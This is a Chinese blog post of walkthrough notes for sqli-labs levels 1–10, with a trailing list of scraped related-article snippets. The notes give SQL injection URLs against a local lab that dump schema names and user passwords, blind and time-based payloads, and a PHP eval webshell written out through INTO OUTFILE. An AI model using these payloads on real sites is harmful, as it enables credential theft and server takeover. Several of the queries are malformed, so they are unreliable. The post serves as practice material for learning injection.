嗷呜一口大桃子
嗷呜一口大桃子

Sqli-lab注入靶场 1-10笔记

目录

通关大致思路:

Less1GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

通关大致思路:

1.判断注入点
2.通过报错信息知道如何闭合参数
3.猜字段数及其回显
4.构造语句获取想要的信息

Less1GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

Sqli-lab注入靶场 1-10笔记_第1张图片

url中添加get参数?id=1,即

http://127.0.0.1/sqli-labs-master/Less-1/?id=1进入注入页面。

Sqli-lab注入靶场 1-10笔记_第2张图片

判断是否有注入点
先输入and 1=1 and 1=2代判断是否是整型注入(因为and 1=1与and 1=2回显的是一样的)

http://127.0.0.1/sqli-labs-master/Less-1/?id=1 and 1=1

http://127.0.0.1/sqli-labs-master/Less-1 /?id=1 and 1=2

Sqli-lab注入靶场 1-10笔记_第3张图片

所以排除整型注入
再用’进行判断注入
利用返回的错误类型,判断是什么类型的字符注入

在url后面添加英文输入法中的单引号,即

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27则报错

Sqli-lab注入靶场 1-10笔记_第4张图片

在这里我遇到了一个问题,就是不报错

 在网上搜寻了一下解决方法:

打开phpstudy小皮,点击设置,配置文件,把所用的php版本中的php.ini中

magic_quotes_gpc = On  改为magic_quotes_gpc = Off,并重启Apache,就可以解决问题

Sqli-lab注入靶场 1-10笔记_第5张图片

然后确定字段数

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 order by 3%23

Sqli-lab注入靶场 1-10笔记_第6张图片

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 order by 4%23

Sqli-lab注入靶场 1-10笔记_第7张图片

联合查询查看页面是否有显示位

http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27 union select 1,2,3%23

Sqli-lab注入靶场 1-10笔记_第8张图片

 查看数据库名

http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

Sqli-lab注入靶场 1-10笔记_第9张图片

查询表名 
http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

Sqli-lab注入靶场 1-10笔记_第10张图片

查询列信息 

http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23

Sqli-lab注入靶场 1-10笔记_第11张图片

查询用户名密码
http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23 

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

把第一题中id=1后面的单引号去掉,其它一样

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

用id=1’查看报错。得知需要)去闭合,所以在第一题的基础上加上),其他一样


Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

用id=1'单引号查看报错,无变化,输入双引号,页面报错,

所以在第一题基础上,使用双引号、右括号闭合,其他一样

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

Sqli-lab注入靶场 1-10笔记_第12张图片

单引号的字符型注入但是没有回显 

查看有多少列

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' order by 3--+

使用二分法

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left((select database()),1)='s'--

使用二分法查库

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100--+

使用二分法查表

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0xsecurity limit 1,1),1,1))>1--+

确定数据

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select username from security.users limit1,1),1,1))>1--+


Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

把上一题的单引号改为双引号即可

Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)

一句话木马:PHP版本:?php@eval($_POST["nnn"]);?其中nnn是密码

http://127.0.0.1/sqli-labs-master/Less-7/?id=1’)) union select 1,2,’’ into outfile “文件所在位置” --+

然后使用中国菜刀访问

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

查看有多少列

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3--+

使用二分法

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select database()),1)='s'--

使用二分法查库

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100--+

使用二分法查表

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0xsecurity limit 1,1),1,1))>1--+

确定数据

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select username from security.users limit1,1),1,1))>1--+

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

整型注入和字符型注入都没有任何回显

基于时间的盲注 

当存在注入漏洞时,可以使用延迟注入进行判断,此时若存在漏洞,则睡眠之后再返回结果

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5)--+

判断数据库长度

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(length(database()=8,1,sleep(5))

如果当前数据库的第一个字母的ASCII值大于113的时候,会立刻返回结果,否则立即执行5S,并判断112

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if ascii(substr((select database()),1,1))>113,2,sleep(5))--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if ascii(substr((select schema_name from information_schema,schemata limit 4,1),1,1)>112,1,sleep(5))--+

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

把第九题的单引号改成双引号即可

你可能感兴趣的:(安全,sql,php)

  • Python使用pymysql和xlrd2将Excel数据导入MySQL数据库 悬崖上的金鱼6 数据库pythonexcelmysqloracle
    在数据处理和管理中,有时候需要将Excel文件中的数据导入到MySQL数据库中进行进一步的分析和操作。本文将介绍如何使用Python编程语言实现这个过程。导入所需库importxlrd2#导入xlrd2库,用于读取Excel文件importpymysql#导入pymysql库,用于连接和操作MySQL数据库fromdatetimeimportdatetime#导入datetime库,用于处理日期和
  • Web渗透练习技巧N则(一) jintonghuoya Web搜索引擎WordPressJoomla
    简介对于我们的生活来说,web的重要性不言而喻,因为这个看起来简单的几个页面与我们的生活的联系越来越紧密,我们有更多的个人信息由其承载往来于服务器和我们的电脑之间,正因为如此,web的安全也变得越来越重要,越来越不能被我们忽视。作为一个网络安全的工作者/爱好者,研究web的安全性也变得越来越重要。那么,接下来的几篇文章,我将陆续给大家介(ban)绍(yun)一些国外的大牛的web渗透的奇技淫巧,当
  • 奶声奶气的【奶九播报NO.136】 七港九
    来都来了不关注一下吗沙雕一刻:生活中我们一定要离负能量朋友远一点,这可能是大家远离我的原因。秋天啊,就是甜甜的糖炒栗子,热乎乎的奶茶,咕噜噜冒着泡的火锅,也是让人有安全感的毛衣,清晨的寒露,酷酷的风衣以及迎面而来的淡淡桂花香。这样微凉的季节,空气中都好像透着雨的清新,秋天的日子总是缓慢又悠长,而你刚好在身边。微博@月月鸟410#不敢rua,他能把我rua没了……##养猫千日用猫一时#满脸写着高兴哈
  • 自学黑客(网络安全) 白袍无涯 web安全网络安全网络安全系统安全运维计算机网络
    前言:想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟
  • 修改Mysql默认字符集 LeslieLiang
    使用SHOWVARIABLESLIKE'character%'查看当前字符集Snipaste_2018-10-09_14-21-34.jpg1.进入Mysql的目录下,将my-default.txt复制为my.ini(影响不大)2.修改my.ini,在对应字段下添加以下内容[mysqld]character-set-server=utf8[client]default-character-set=
  • mycat双主高可用架构部署-MySQL5.7环境部署第一台 龙哥·三年风水 MySQL5.7.36分布式高可用架构mysql分布式
    MySQL5.7服务器IP是192.168.31.209及192.168.31.2101、192.168.31.209:3307实例部署a、配置文件mkdir-p/data/mysql/mysql3307/{data,logs}#创建MySQL数据及日志目录vi/data/mysql/mysql3307/my3307.cnf#配置文件整理[client]#password=your_passwor
  • Linux:从入门到放弃 Monly21 Linuxlinux
    目录一、基础巩固Linux:常用命令二、实战应用Linux:CentOS7基础配置Linux:CentOS7安装MySQL三、常见问题Linux:yum源失效问题一、基础巩固Linux:常用命令二、实战应用Linux:CentOS7基础配置Linux:CentOS7安装MySQL三、常见问题Linux:yum源失效问题
  • 关于sql的优化 码海串游 数据库
    覆盖索引尽量使用覆盖索引,(查询使用了索引,并且需要返回的列,在该索引中已经全部能够找到),减少select*usingindexcondition;查找使用了索引,但是需要回表查询数据。usingwhere;usingindex;查找使用了索引,但是需要的数据都在索引列中能找到,所以不需要回表查询数据。前缀索引:当字段类型为字符串(varchar,text)时,有时候需要索引很长的字符串,这会让
  • 应用基本期末 渔jy Android系统及应用应用物联网
    选以下哪些属于Java的三大特性:a.抽象b.封装c.面向对象d.分布式e.安全性f.平台独立以下哪些是Object的公用方法?a.equals()b.getContext()c.notify()d.toString()e.clone()int和integer两个谁更占用内存?a.Intb.integer“a==b”和“a.equals(b)”是否有区别?a.Yesb.No以下关于ArrayLis
  • SQLite数据库管理与Android应用集成 含老司开挖掘机
    本文还有配套的精品资源,点击获取简介:SQLite是一种轻量级的关系型数据库,适用于移动设备和单机应用。它内置了对SQL标准的支持,并提供丰富的数据操作功能。在Android开发中,SQLite是默认的数据库解决方案,可通过SQLiteOpenHelper和SQLiteDatabaseAPI进行管理。本教程将通过实践帮助理解SQLite数据库的创建、管理和使用,以及如何将其与Android应用集成
  • atomic nonatomic assign retain copy strong weak 介绍 weixin_30493321 移动开发
    atomic和nonatomic用来决定编译器生成的getter和setter是否为原子操作。atomic设置成员变量的@property属性时,默认为atomic,提供多线程安全。在多线程环境下,原子操作是必要的,否则有可能引起错误的结果。加了atomic,setter函数会变成下面这样:{lock}if(property!=newValue){[propertyrelease];propert
  • C# WinForm实现WebService接口进行图片上传下载 诡道荒行
    本文还有配套的精品资源,点击获取简介:本文深入介绍了在C#WinForm应用程序中使用WebService接口连接服务器,实现图片的上传和下载功能。通过理解WebService基础,利用WinForm工具创建用户界面,并实现客户端与WebService的连接,我们详细探讨了图片上传与下载的具体步骤,包括文件选择、数据转换、接口调用,以及异常处理和进度显示。同时,还强调了安全性与性能优化的重要性,确
  • c语言atomic能用数组的,属性关键字 非著名程序~~~ c语言atomic能用数组的
    一.属性关键字的分类?读写权限:readonly、readwrite(默认)原子相关:atomic(默认)、nonatomic(常用)aomic:可以保证赋值和获取是线程安全的。指的是成员属性直接的获取和赋值,不包括操作和访问。eg:用atomic修饰数组,获取和赋值保证线程安全,添加、移除对象,是不保证线程安全的。引用计数retain(mrc)、strong(arc):修饰对象assign(修饰
  • linux系统下PostgreSQL的使用 敲代码的雪糕 linuxlinuxpostgresql运维
    文章目录前言一、安装pgsql数据库二、安装c和c++驱动三、使用1、头文件2、源文件3、main文件4、编译前言最近工作中使用到了pgsql,主要是使用其c++驱动完成数据库创建及增删改查等操作…一、安装pgsql数据库使用命令如下:sudoapt-getinstallpostgresql安装完成,使用如下命令,确认数据库版本:psql--version二、安装c和c++驱动使用如下命令安装c驱
  • maven工程使用sonar tommyhxh
    maven项目配置maven的setting.xml文件Maven插件会自动把所需数据(如单元测试结果、静态检测结果等)上传到Sonar服务器上,Sonar的配置并不在每个工程的pom.xml文件里,而是在Maven的配置文件settings.xml里。在标签添加:sonartruejdbc:mysql://10.16.8.96:3306/sonar?useUnicode=true&cha
  • 作为大学生,你要做的两件事 秋燃讲故事
    今天辅导员跟我们讲放假的事项,说一些要注意的问题,比如安全问题。她说了挺多的,但我听进去的就几句话,我认为那几句话是比较有用,而且是应该要做的事情。虽然这样的话,应该听过很多遍,但还是再说一次,记下来。晚上不要熬夜,十一点关灯睡觉,养足精神,才能好好学习,做事才有精力。我想很多人都是习惯熬夜,每天都是不到十二点不睡觉。或者说到了十二点还是没有睡,一直都是在玩手机。女生习惯逛淘宝,每天花在淘宝上的时
  • 从管控角度谈慢SQL治理 egzosn sql数据库服务器oracle运维
    一、什么是慢SQL慢SQL是指那些执行效率低下、响应时间长,导致用户等待时间变长和服务器资源利用率下降的SQL查询。那么,如何定义一个SQL查询是"慢"的呢?这不是一个绝对时间的问题,而是需要从多维度考量。时间维度最常见的定义慢SQL的方法是时间阈值。这个阈值可以根据不同的系统和性能要求设置。例如,一个查询如果在网页应用中执行时间超过2秒,或在数据分析系统中执行超过30秒,就可以被认为是慢的。业务
  • SQL的高级查询练习知识点(day24) 小星袁 MySQL数据库基础知识大全数据库sqlmysql
    目录1学习目标2基础查询2.1语法2.2例子3条件查询3.1含义3.2语法3.3条件表达式3.3.1条件运算符3.3.2例子3.4逻辑表达式3.4.1逻辑运算符3.4.2例子3.5模糊查询3.5.1概述3.5.2例子4DISTINCT关键字4.1含义4.2例子5总结一键三连哦!各位袁友......1学习目标重点掌握基础查询语法重点掌握条件查询语法重点掌握distinct关键字的使用2基础查询2.1
  • iOS——atomic、nonatomic、assign、_unsafe_unretain 糸师凛 ioscocoamacos
    atomic和nonatomic在iOS开发中,当你定义一个属性时,编译器会自动为你生成一个带下划线的成员变量(实例变量)以及对应的getter和setter方法。如果你使用atomic修饰这个属性,那么编译器在生成setter和getter方法时,会在这些方法的内部实现中加入加锁操作。但是加锁只能保证getter和setter方法内部的线程安全,并不能保证对该属性的所有操作都是线程安全的。具体的
  • mysql之连接符函数使用sql顺序以及键约束介绍 calmtho 数据库mysql
    文章目录单表查询1.格式2.关键字连接符操作符等3.分组函数/聚合函数/多行处理函数2.连接查询3.进阶类关键字1.union合并查询结果集2.limit分页时间表的键存储引擎mysql执行脚本指令案例sql脚本单表查询1.格式select...from...where...groupby...having...orderby...执行顺序:1.from2.where3.groupby4.havi
  • 使用docker部署考试系统 汪公子492 docker
    web--拉取nginx--挂载项目文档dist--dockerrun-itd-v/root/pes/web/dist/:/usr/share/nginx/html-p80:80nginx:latest配置mysql服务--拉取mysql:5.7.44镜像--创建容器测试dockerrun-itd-p3306:3306-eMYSQL_ROOT_PASSWORD=rootmysql:5.7.44do
  • 【跟上黑马学sql】学习笔记-MySQL-DQL-排序查询 学扎娃的小白 mysqlsql学习
    DQL排序查询实例#创建一个表createtableemp4(idintcomment'编号',worknovarchar(10)comment'工号',namevarchar(5)comment'姓名',genderchar(1)comment'性别',agetinyintunsignedcomment'年龄',idcardchar(18)comment'身份证号',workaddressvar
  • 阳光大课间 西凉燕衔妮
    下午校长叫我们几个开了个小会,主要讨论一下大课间让学生干什么。自从喊出“阳光一小时”的口号后,我们一直在努力给孩子们创造一个安全、健康、有趣的阳光大课间。从最开始的做广播体操,到后来的跳绳、滚铁环,再到现在的韵律操、乒乓球操、长拳,每一次都要老师们大显身手,学会一项教一项。今天开会提到同学们做的乒乓球操不整齐,校长建议换掉,另外针对学生人数少的特点,我们决定在跳完集体韵律操之后把学生分成三个组活动
  • mysql日期加间隔_MySQL DATE_ADD和ADDDATE函数实现向日期添加指定时间间隔 风花雪月不等人 mysql日期加间隔
    MySQLDATE_ADD(date,INTERVALexprtype)和ADDDATE(date,INTERVALexprtype)两个函数的作用相同,都是用于执行日期的加运算。DATE_ADD()和ADDDATE()函数有两个参数:date是DATE或DATETIME的起始值。INTERVALexprtype是要添加到起始日期值的间隔值。【实例1】使用DATE_ADD(date,INTERVA
  • Web安全之CSRF攻击详解与防护 J老熊 JavaWeb安全web安全csrf安全java面试运维
    在互联网应用中,安全性问题是开发者必须时刻关注的核心内容之一。跨站请求伪造(Cross-SiteRequestForgery,CSRF),是一种常见的Web安全漏洞。通过CSRF攻击,黑客可以冒用受害者的身份,发送恶意请求,执行诸如转账、订单提交等操作,导致严重的安全后果。本文将详细讲解CSRF攻击的原理及其防御方法,结合电商交易系统的场景给出错误和正确的示范代码,并分析常见的安全问题与解决方案,
  • MySQL 字符串操作详解和案例示范 J老熊 MySQL实战秘籍mysql数据库运维面试
    MySQL字符串操作详解MySQL提供了丰富的字符串操作函数,能够对这些字符串进行截取、定位、替换等操作。本文将详细讲解MySQL中的字符串操作函数,包括SUBSTRING()、SUBSTR()、LEFT()、RIGHT()、LOCATE()、POSITION()、FIND_IN_SET()、ELT()、INSERT()和REPLACE(),并分析它们的区别和用法。一、SUBSTRING()和SU
  • 成为数据分析师的必要条件 HsuHeinrich 数据分析数据分析
    开篇成为数据分析师的必要条件作为一名成熟的数据分析师,那必然是要头顶Python,脚踩SQL,左手一个Tableau,右手一个Excel。能取数,会报表,埋点AB两不误,分析落地显价值。那在日常工作中具体需要具备哪些技能呢?笔者根据个人工作学习,对自己做了个技能画像。接下来,笔者将从工具应用、理论基础、数字基建、分析思维四个方面介绍数据分析的必要条件。对其中一些基本技能附上基础教程,帮助初学者迈进
  • mysql hashcode函数_Mysql源码学习——没那么简单的Hash weixin_39793794 mysqlhashcode函数
    Hash链表的应用比较常见,其目的就是为了将不同的值映射到不同的位置,查找的时候直接找到相应的位置,而不需要传统的顺序遍历或是二分查找,从而达到减少查询时间的目的。常规的hash是预定义一定的桶(bucket),规定一个hash函数,然后进行散列。然而Mysql中的hash没有固定的bucket,hash函数也是动态变化的,本文就进行非深入介绍。基本结构体Hash的结构体定义以及相关的函数接口定义
  • mysql数字转换中文版_mysql 阿拉伯数字转换中文函数 七焱 mysql数字转换中文版
    CREATEDEFINER=`root`@`%`FUNCTION`sp_cn`(n_LowerMoneydecimal(15,2))RETURNSvarchar(200)CHARSETutf8beginDeclarev_LowerStrVARCHAR(200);Declarev_UpperPartVARCHAR(200);Declarev_UpperStrVARCHAR(200);Declarei
  • 20个MySQL 日期和时间函数,附带用法说明 蜗牛小白 MySQLmysql数据库
    在数据库管理和数据处理过程中,日期和时间的处理是一个重要的方面。MySQL提供了一组强大的日期和时间函数,允许用户对日期和时间数据进行各种操作和计算。这些函数可以帮助用户进行日期的格式化、日期之间的差异计算、从日期中提取特定部分等操作。以下列举了一些常用的MySQL日期和时间函数及其详细示例,以帮助开发者更高效地处理和管理日期和时间数据。常用的MySQL日期和时间函数1.NOW()返回当前日期和时
  • 解读Servlet原理篇二---GenericServlet与HttpServlet 周凡杨 javaHttpServlet源理GenericService源码
    在上一篇《解读Servlet原理篇一》中提到,要实现javax.servlet.Servlet接口(即写自己的Servlet应用),你可以写一个继承自javax.servlet.GenericServletr的generic Servlet ,也可以写一个继承自java.servlet.http.HttpServlet的HTTP Servlet(这就是为什么我们自定义的Servlet通常是exte
  • MySQL性能优化 bijian1013 数据库mysql
            性能优化是通过某些有效的方法来提高MySQL的运行速度,减少占用的磁盘空间。性能优化包含很多方面,例如优化查询速度,优化更新速度和优化MySQL服务器等。本文介绍方法的主要有:         a.优化查询         b.优化数据库结构  
  • ThreadPool定时重试 dai_lm javaThreadPoolthreadtimertimertask
    项目需要当某事件触发时,执行http请求任务,失败时需要有重试机制,并根据失败次数的增加,重试间隔也相应增加,任务可能并发。 由于是耗时任务,首先考虑的就是用线程来实现,并且为了节约资源,因而选择线程池。 为了解决不定间隔的重试,选择Timer和TimerTask来完成 package threadpool; public class ThreadPoolTest {
  • Oracle 查看数据库的连接情况 周凡杨 sqloracle 连接
    首先要说的是,不同版本数据库提供的系统表会有不同,你可以根据数据字典查看该版本数据库所提供的表。 select * from dict where table_name like '%SESSION%'; 就可以查出一些表,然后根据这些表就可以获得会话信息 select sid,serial#,status,username,schemaname,osuser,terminal,ma
  • 类的继承 朱辉辉33 java
    类的继承可以提高代码的重用行,减少冗余代码;还能提高代码的扩展性。Java继承的关键字是extends 格式:public class 类名(子类)extends 类名(父类){ } 子类可以继承到父类所有的属性和普通方法,但不能继承构造方法。且子类可以直接使用父类的public和 protected属性,但要使用private属性仍需通过调用。 子类的方法可以重写,但必须和父类的返回值类
  • android 悬浮窗特效 肆无忌惮_ android
    最近在开发项目的时候需要做一个悬浮层的动画,类似于支付宝掉钱动画。但是区别在于,需求是浮出一个窗口,之后边缩放边位移至屏幕右下角标签处。效果图如下:   一开始考虑用自定义View来做。后来发现开线程让其移动很卡,ListView+动画也没法精确定位到目标点。   后来想利用Dialog的dismiss动画来完成。   自定义一个Dialog后,在styl
  • hadoop伪分布式搭建 林鹤霄 hadoop
    要修改4个文件    1: vim hadoop-env.sh  第九行    2: vim core-site.xml            <configuration>     &n
  • gdb调试命令 aigo gdb
    原文:http://blog.csdn.net/hanchaoman/article/details/5517362   一、GDB常用命令简介   r run 运行.程序还没有运行前使用 c             cuntinue 
  • Socket编程的HelloWorld实例 alleni123 socket
    public class Client { public static void main(String[] args) { Client c=new Client(); c.receiveMessage(); } public void receiveMessage(){ Socket s=null; BufferedRea
  • 线程同步和异步 百合不是茶 线程同步异步
    多线程和同步 : 如进程、线程同步,可理解为进程或线程A和B一块配合,A执行到一定程度时要依靠B的某个结果,于是停下来,示意B运行;B依言执行,再将结果给A;A再继续操作。 所谓同步,就是在发出一个功能调用时,在没有得到结果之前,该调用就不返回,同时其它线程也不能调用这个方法   多线程和异步:多线程可以做不同的事情,涉及到线程通知     &
  • JSP中文乱码分析 bijian1013 javajsp中文乱码
            在JSP的开发过程中,经常出现中文乱码的问题。         首先了解一下Java中文问题的由来:         Java的内核和class文件是基于unicode的,这使Java程序具有良好的跨平台性,但也带来了一些中文乱码问题的麻烦。原因主要有两方面,
  • js实现页面跳转重定向的几种方式 bijian1013 JavaScript重定向
            js实现页面跳转重定向有如下几种方式: 一.window.location.href <script language="javascript"type="text/javascript"> window.location.href="http://www.baidu.c
  • 【Struts2三】Struts2 Action转发类型 bit1129 struts2
     在【Struts2一】 Struts Hello World http://bit1129.iteye.com/blog/2109365中配置了一个简单的Action,配置如下   <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configurat
  • 【HBase十一】Java API操作HBase bit1129 hbase
    Admin类的主要方法注释:   1. 创建表 /** * Creates a new table. Synchronous operation. * * @param desc table descriptor for table * @throws IllegalArgumentException if the table name is res
  • nginx gzip ronin47 nginx gzip
    Nginx GZip 压缩 Nginx GZip 模块文档详见:http://wiki.nginx.org/HttpGzipModule 常用配置片段如下: gzip on; gzip_comp_level 2; # 压缩比例,比例越大,压缩时间越长。默认是1 gzip_types text/css text/javascript; # 哪些文件可以被压缩 gzip_disable &q
  • java-7.微软亚院之编程判断俩个链表是否相交 给出俩个单向链表的头指针,比如 h1 , h2 ,判断这俩个链表是否相交 bylijinnan java
    public class LinkListTest { /** * we deal with two main missions: * * A. * 1.we create two joined-List(both have no loop) * 2.whether list1 and list2 join * 3.print the join
  • Spring源码学习-JdbcTemplate batchUpdate批量操作 bylijinnan javaspring
    Spring JdbcTemplate的batch操作最后还是利用了JDBC提供的方法,Spring只是做了一下改造和封装 JDBC的batch操作: String sql = "INSERT INTO CUSTOMER " + "(CUST_ID, NAME, AGE) VALUES (?, ?, ?)";
  • [JWFD开源工作流]大规模拓扑矩阵存储结构最新进展 comsci 工作流
        生成和创建类已经完成,构造一个100万个元素的矩阵模型,存储空间只有11M大,请大家参考我在博客园上面的文档"构造下一代工作流存储结构的尝试",更加相信的设计和代码将陆续推出.........     竞争对手的能力也很强.......,我相信..你们一定能够先于我们推出大规模拓扑扫描和分析系统的....
  • base64编码和url编码 cuityang base64url
    import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.PrintWriter; import java.io.StringWriter; import java.io.UnsupportedEncodingException;
  • web应用集群Session保持 dalan_123 session
    关于使用 memcached 或redis 存储 session ,以及使用 terracotta 服务器共享。建议使用 redis,不仅仅因为它可以将缓存的内容持久化,还因为它支持的单个对象比较大,而且数据类型丰富,不只是缓存 session,还可以做其他用途,一举几得啊。1、使用 filter 方法存储这种方法比较推荐,因为它的服务器使用范围比较多,不仅限于tomcat ,而且实现的原理比较简
  • Yii 框架里数据库操作详解-[增加、查询、更新、删除的方法 'AR模式'] dcj3sjt126com 数据库
        public function getMinLimit () {        $sql = "...";        $result = yii::app()->db->createCo
  • solr StatsComponent(聚合统计) eksliang solr聚合查询solr stats
    StatsComponent 转载请出自出处:http://eksliang.iteye.com/blog/2169134 http://eksliang.iteye.com/ 一、概述        Solr可以利用StatsComponent 实现数据库的聚合统计查询,也就是min、max、avg、count、sum的功能   二、参数
  • 百度一道面试题 greemranqq 位运算百度面试寻找奇数算法bitmap 算法
    那天看朋友提了一个百度面试的题目:怎么找出{1,1,2,3,3,4,4,4,5,5,5,5}  找出出现次数为奇数的数字.   我这里复制的是原话,当然顺序是不一定的,很多拿到题目第一反应就是用map,当然可以解决,但是效率不高。   还有人觉得应该用算法xxx,我是没想到用啥算法好...!   还有觉得应该先排序...   还有觉
  • Spring之在开发中使用SpringJDBC ihuning spring
      在实际开发中使用SpringJDBC有两种方式:   1. 在Dao中添加属性JdbcTemplate并用Spring注入;     JdbcTemplate类被设计成为线程安全的,所以可以在IOC 容器中声明它的单个实例,并将这个实例注入到所有的 DAO 实例中。JdbcTemplate也利用了Java 1.5 的特定(自动装箱,泛型,可变长度
  • JSON API 1.0 核心开发者自述 | 你所不知道的那些技术细节 justjavac json
    2013年5月,Yehuda Katz 完成了JSON API(英文,中文) 技术规范的初稿。事情就发生在 RailsConf 之后,在那次会议上他和 Steve Klabnik 就 JSON 雏形的技术细节相聊甚欢。在沟通单一 Rails 服务器库—— ActiveModel::Serializers 和单一 JavaScript 客户端库——&
  • 网站项目建设流程概述 macroli 工作
    一.概念 网站项目管理就是根据特定的规范、在预算范围内、按时完成的网站开发任务。 二.需求分析 项目立项   我们接到客户的业务咨询,经过双方不断的接洽和了解,并通过基本的可行性讨论够,初步达成制作协议,这时就需要将项目立项。较好的做法是成立一个专门的项目小组,小组成员包括:项目经理,网页设计,程序员,测试员,编辑/文档等必须人员。项目实行项目经理制。 客户的需求说明书   第一步是需
  • AngularJs 三目运算 表达式判断 qiaolevip 每天进步一点点学习永无止境众观千象AngularJS
    事件回顾:由于需要修改同一个模板,里面包含2个不同的内容,第一个里面使用的时间差和第二个里面名称不一样,其他过滤器,内容都大同小异。希望杜绝If这样比较傻的来判断if-show or not,继续追究其源码。 var b = "{{", a = "}}"; this.startSymbol = function(a) {
  • Spark算子:统计RDD分区中的元素及数量 superlxw1234 sparkspark算子Spark RDD分区元素
    关键字:Spark算子、Spark RDD分区、Spark RDD分区元素数量     Spark RDD是被分区的,在生成RDD时候,一般可以指定分区的数量,如果不指定分区数量,当RDD从集合创建时候,则默认为该程序所分配到的资源的CPU核数,如果是从HDFS文件创建,默认为文件的Block数。   可以利用RDD的mapPartitionsWithInd
  • Spring 3.2.x将于2016年12月31日停止支持 wiselyman Spring 3
                  Spring 团队公布在2016年12月31日停止对Spring Framework 3.2.x(包含tomcat 6.x)的支持。在此之前spring团队将持续发布3.2.x的维护版本。          请大家及时准备及时升级到Spring
  • fis纯前端解决方案fis-pure zccst JavaScript
    作者:zccst FIS通过插件扩展可以完美的支持模块化的前端开发方案,我们通过FIS的二次封装能力,封装了一个功能完备的纯前端模块化方案pure。 1,fis-pure的安装 $ fis install -g fis-pure $ pure -v 0.1.4 2,下载demo到本地 git clone https://github.com/hefangshi/f
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他